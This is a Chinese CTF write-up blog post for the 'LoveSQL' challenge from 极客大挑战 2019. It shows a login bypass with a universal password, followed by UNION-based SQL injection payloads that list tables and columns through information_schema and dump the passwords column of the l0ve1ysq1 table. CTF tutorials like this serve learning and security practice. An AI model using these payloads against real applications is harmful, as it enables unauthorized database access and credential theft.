[极客大挑战 2019]LoveSQL 1

万能密码先试一波
发现直接进去了,但是给了一串不是flag的东西,我拿去解码也没用,我就卡住了
在这里插入图片描述
接下来就是查询字段数
这里要注意,可以通过url来判断,前面得是admin,不然是错误登陆,在这里插入图片描述
从一试到四,发现只有三个字段
在这里插入图片描述
接下来是联合查询
原理:
在这里插入图片描述
union select1,2,3...#找到了原来表的字段数后写上相同数量的数字,他会构造临时记录(这个操作一般是测试注入点)
当然也可以查询其他的信息比如库的名字和版本
因为第二个查询没有条件
在这里插入图片描述
在这里插入图片描述
发现这个没效果,因为admin这个记录里存在的值,所以我们试记录里没有的值
在这里插入图片描述
在这里插入图片描述
回显了2和3,可以猜测第二个字段是我们的名字,第三个字段是密码!

下一步查询表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述
当前数据库有两个表,一看就是第二表有flag,题目都叫lovesql

下一步查询字段名

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

在这里插入图片描述
查出了三个字段

接下来就是查询记录咯

1' union select 1,2,password from l0ve1ysq1#

在这里插入图片描述
我太难了,flag还没出???
回想起之前用order by查询的有三条记录来着
再用group_by全部拼接输出就行了

1' union select 1,2,group_concat(password) from l0ve1ysq1 #

flag就出来了
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值